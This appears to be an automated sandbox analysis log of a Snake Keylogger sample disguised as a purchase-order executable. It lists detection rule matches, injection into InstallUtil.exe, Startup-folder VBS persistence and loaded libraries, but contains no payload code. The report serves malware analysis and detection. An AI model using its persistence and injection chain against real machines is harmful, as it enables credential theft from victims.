Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062474A8	12_2_062474A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062428B0	12_2_062428B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624B08F	12_2_0624B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240488	12_2_06240488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247497	12_2_06247497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240498	12_2_06240498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062408E0	12_2_062408E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062478F0	12_2_062478F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062408F0	12_2_062408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624BD28	12_2_0624BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240D39	12_2_06240D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247900	12_2_06247900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240D48	12_2_06240D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247D48	12_2_06247D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247D58	12_2_06247D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062481A0	12_2_062481A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062481B0	12_2_062481B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624518A	12_2_0624518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06241191	12_2_06241191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245198	12_2_06245198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624C9C8	12_2_0624C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F1D8	12_2_0624F1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F1DB	12_2_0624F1DB

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3f1fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.41121e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: PO_63738373663838____________________________________________________________________________.exe, CodeMapperSchema.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.4031d40.1.raw.unpack, CodeMapperSchema.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3ed1590.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO_63738373663838____________________________________________________________________________.exe.3e81570.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@5/5

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs"

Source: PO_63738373663838____________________________________________________________________________.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO_63738373663838____________________________________________________________________________.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000007.00000002.3709580619.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000332B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3714056089.0000000004130000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3714749608.000000000391E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO_63738373663838____________________________________________________________________________.exe

ReversingLabs: Detection: 39%

Source: PO_63738373663838____________________________________________________________________________.exe	String found in binary or memory: # -Expected STREAM-START.
Source: PO_63738373663838____________________________________________________________________________.exe	String found in binary or memory: evtKExpected DOCUMENT-START or STREAM-END%TAG
Source: PO_63738373663838____________________________________________________________________________.exe	String found in binary or memory: Expected SCALAR, SEQUENCE-START, MAPPING-START, or ALIAS, got {0}_Neither tag nor isImplicit flags are specified.
Source: PO_63738373663838____________________________________________________________________________.exe	String found in binary or memory: <<KDid not find expected <stream-start>.ODid not find expected <document start>.UThe scanner should contain no more tokens.AFound duplicate %YAML directive.CFound incompatible YAML document.?Found duplicate %TAG directive.cWhile parsing a node, found undefined tag handle.eWhile parsing a node, did not find expected token.sWhile parsing a node, did not find expected node content.KDid not find expected <document end>.

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

File read: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe "C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe"
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Keywords.exe "C:\Users\user\AppData\Roaming\Keywords.exe"
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Keywords.exe "C:\Users\user\AppData\Roaming\Keywords.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
